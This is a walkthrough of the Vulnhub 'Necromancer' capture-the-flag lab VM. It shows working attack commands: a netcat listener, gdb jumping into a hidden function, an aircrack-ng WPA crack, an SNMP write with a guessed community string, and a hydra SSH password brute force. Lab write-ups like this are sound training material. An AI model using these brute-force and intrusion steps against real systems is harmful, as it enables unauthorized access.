Necromancer | [Vulnhub walkthrough]

7 min readAug 25, 2020

So here i’m with a new machine name “Necromancer”… difficulty level is EASY. This box have total 11 flags to solve. So, let’s start with enumeration.

nmap -n <IP>
nmap -sC -A -T5 <IP>
nmap -Pn <IP>

well i did number of nmap commands but i didn’t find anything, every time it show there is no port open. So i open my wireshark to see if any handshakes happen or any requests .

And see, vm wants to make connection with our machines on port 4444 with tcp. So lets start listening on port 4444.

nc -vv -lp 4444

Here we go, we got a big code looks like base64, so lets try to decode….

echo “encoded_string” | base64 -d

Correct! its encoded in base64 and in the last line its mention that we have to chant the string of flag1 at port 666, string inside flag is look like a MD5 encoded, you can check on hash-identifier also….let’s decode it first and start listening on port number 666.

string is “opensesame” now listen it on port 666.

echo “opensesame” | nc -<IP> 666

We got 2nd flag and as you can see in last third line its mention that “formation looks like the numeral 80” , i think port 80 (HTTP port) is open now, let’s check!

there is a photo and a poem, now i downloaded it and see if i can get anyhting from this photo.

i just try binwalk on this photo and i get an extracted file (_pileoffeathers.jpg.extracted), in that file i get on more file feathers.txt which is our flag3, it also in base64 so …. decode it and we got a dir. (/amagicbridgeappearsatthechasm) for our http server. Let’s explore more..

again a photo , download it and check what inside in it.

Well, i got nothing from this file :( … now at that place i dont have nay idea what to do so i just run dirb to check if any hidden dir. is there….

dirb <url> <wordlists_path>

Damn it XD! a hidden file name “talisman” , lets check ..

its a downlodable file…downlode it and check what it is!….i checked it is a 32 bit LSB executable file….give it permisions and run it.

chmod +x <file_name>

uhhhh! didn’t get anything from this …. i tried to debug it and se what i got.

gdb <file_name>
gdb info function

okay so function name “WearTalisman” is working and below this function there is another function named “chantToBreakSpell” …. probabily it is a function where we get our next flag ..just check it!

break WearTalisman
run
jump chantToBreakSpell

gotchaaa! we got our 4th flag NICE!, okay now we have to chant the string on port number 31337, decode it

after decode the string i got “blackmagic” as a result now chant it and listen on port 31337

echo “blackmagic” | nc -u <IP> <PORT>

Okay! Got one more directory with flag5….

/thenecromancerwillabsorboursoul directory

Got another picture with flag6 , in last a hint is given for port number 161, there is a file necromancer , downloaded it and check….

this file is bzip2 compressed and that unzip to tar archive , which gives final file named “necromancer.cap” which is opened in wireshark…so,open this filein wireshark.

after checking , i found that there is a 802.11 protocol is used, i get WPA key data…now i tried to crack it with aircrack-ng ..

airnack-ng <file_name> /usr/share/wordlist/rockyou.txt

we got key → “death2all”, as we saw previously we have to chant this and open port number 161.

infinity@kali:~$ nc -uv 10.0.2.13 161
10.0.2.13: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.2.13] 161 (snmp) open
death2all

okay! so this is for snmp protocol, so i did snmpwalk with privious passwd “death2all”

infinity@kali:~$ snmpwalk -v 2c -c death2all 10.0.2.13
Created directory: /var/lib/snmp/mib_indexes
iso.3.6.1.2.1.1.1.0 = STRING: “You stand in front of a door.”
iso.3.6.1.2.1.1.4.0 = STRING: “The door is Locked. If you choose to defeat me, the door must be Unlocked.”
iso.3.6.1.2.1.1.5.0 = STRING: “Fear the Necromancer!”
iso.3.6.1.2.1.1.6.0 = STRING: “Locked — death2allrw!”
iso.3.6.1.2.1.1.6.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

i guess we have to unlock the door on the other hand iso.3.6.1.2.1.1.6.0 said it is locked let’s change MIBS.

infinity@kali:~$ snmpset -v 2c -c death2allrw 10.0.2.13 iso.3.6.1.2.1.1.6.0 s “Unlocked”
iso.3.6.1.2.1.1.6.0 = STRING: “Unlocked”
infinity@kali:~$ snmpwalk -v 2c -c death2all 10.0.2.13 iso.3.6.1.2.1.1.1.0 = STRING: “You stand in front of a door.”
iso.3.6.1.2.1.1.1.0 = STRING: “You stand in front of a door.”
infinity@kali:~$ snmpwalk -v 2c -c death2all 10.0.2.13
iso.3.6.1.2.1.1.4.0 = STRING: “The door is unlocked! You may now enter the Necromancer’s lair!”
iso.3.6.1.2.1.1.5.0 = STRING: “Fear the Necromancer!”
iso.3.6.1.2.1.1.6.0 = STRING: “flag7{9e5494108d10bbd5f9e7ae52239546c4} — t22”
iso.3.6.1.2.1.1.6.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

Got it, flag7 for port 22 which is ssh port, after decode this string from md5 i got “demonslayer” it look likes a username for ssh port ….and password?

hydra B-) …….

hydra -l demonslayer -P /usr/share/wordlist/rockyou.txt ssh://10.0.2.13

huuhhhh! password is “12345678” very strong passwd XD XD XD….

okay when you successfully enter through ssh port you got an nercomancer art COOOL!!! let check more ……

found flag8.txt ….in last its given that “Defend yourself! counter attack the Necromancer’s spells at u777 ”….i tried to listen it on machine IP but it give no respond so, finally i did it on my localhost and them we got a TEST (-_-) of three question you can google them very easy questions!!!…..you also get your flags with every question.